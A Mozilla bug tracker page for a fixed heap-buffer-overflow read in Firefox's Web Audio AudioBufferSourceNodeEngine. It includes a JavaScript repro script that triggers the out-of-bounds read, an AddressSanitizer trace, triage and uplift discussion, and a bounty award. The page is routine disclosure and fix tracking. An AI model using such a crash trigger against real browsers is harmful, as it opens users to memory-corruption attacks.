Closed
Bug 874915
Opened 11 years ago
Closed 11 years ago
Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer
Categories
(Core :: Web Audio, defect)
Tracking
()
RESOLVED
FIXED
mozilla24
Tracking | Status | |
---|---|---|
firefox21 | --- | unaffected |
firefox22 | + | disabled |
firefox23 | + | disabled |
firefox24 | + | fixed |
firefox-esr17 | --- | unaffected |
b2g18 | --- | unaffected |
People
(Reporter: attekett, Assigned: ehsan.akhgari)
References
Details
(4 keywords, Whiteboard: [asan][adv-main24-])
Attachments
(2 files)
(deleted),
text/html
|
Details | |
(deleted),
patch
|
roc
:
review+
|
Details | Diff | Splinter Review |
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN opt-build 24.0a1 from
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/
Repro-case:
<script>
var Context0= new AudioContext()
var BufferSource6=Context0.createBufferSource();
setInterval(function(){
BufferSource6.buffer=function(){
var length=11283;
var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
var bufferData= Buffer.getChannelData(0);
for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(624))};
return Buffer;
}();
},0)
BufferSource6.start(0.15831333969254047,0.23571860056836158,0.529235512483865);
BufferSource6.buffer=function(){
var length=48517;
var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
var bufferData= Buffer.getChannelData(0);
for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(365))};
return Buffer;
}();
</script>
ASAN-report:
==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
#0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
#1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
#2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
#3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
#4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
#5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
Updated•11 years ago
|
OS: Linux → All
Updated•11 years ago
|
Assignee | ||
Comment 1•11 years ago
|
||
Assignee | ||
Updated•11 years ago
|
Attachment #752781 -
Attachment mime type: text/plain → text/html
Assignee | ||
Comment 3•11 years ago
|
||
For the analysis, see bug 874934.
Assignee | ||
Comment 4•11 years ago
|
||
Attachment #752894 -
Flags: review?(roc) → review+
Assignee | ||
Comment 5•11 years ago
|
||
Comment 6•11 years ago
|
||
Triaging with Ehsan, affects 22 through 24.
status-firefox21:
--- → unaffected
status-firefox22:
--- → affected
status-firefox23:
--- → affected
status-firefox24:
--- → affected
tracking-firefox22:
--- → ?
tracking-firefox23:
--- → ?
tracking-firefox24:
--- → ?
Updated•11 years ago
|
Comment 7•11 years ago
|
||
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Updated•11 years ago
|
Flags: sec-bounty?
Updated•11 years ago
|
Comment 8•11 years ago
|
||
WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
Comment 9•11 years ago
|
||
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating.
https://wiki.mozilla.org/Security/Bug_Approval_Process
We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
Assignee | ||
Comment 10•11 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?
Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.
(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?
This is not needed on Beta since Web Audio is disabled there. And it will be disabled on 23 once it gets to release. Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Assignee | ||
Comment 11•11 years ago
|
||
Mass moving Web Audio bugs to the Web Audio component. Filter on duckityduck.
Component: Video/Audio → Web Audio
Updated•11 years ago
|
status-firefox-esr17:
--- → unaffected
Updated•11 years ago
|
Attachment #757679 -
Attachment description: Bounty Awarded $3000 → Bounty Awarded $3000 [paid] 6/6/13
Updated•11 years ago
|
Whiteboard: [asan] → [asan][adv-main24-]
Updated•11 years ago
|
status-b2g18:
--- → unaffected
Updated•11 years ago
|
Flags: in-testsuite?
Updated•11 years ago
|
Flags: in-testsuite? → in-testsuite+
Updated•11 years ago
|
Group: core-security
Updated•8 years ago
|
Keywords: csectype-bounds
You need to log in
before you can comment on or make changes to this bug.
Description
•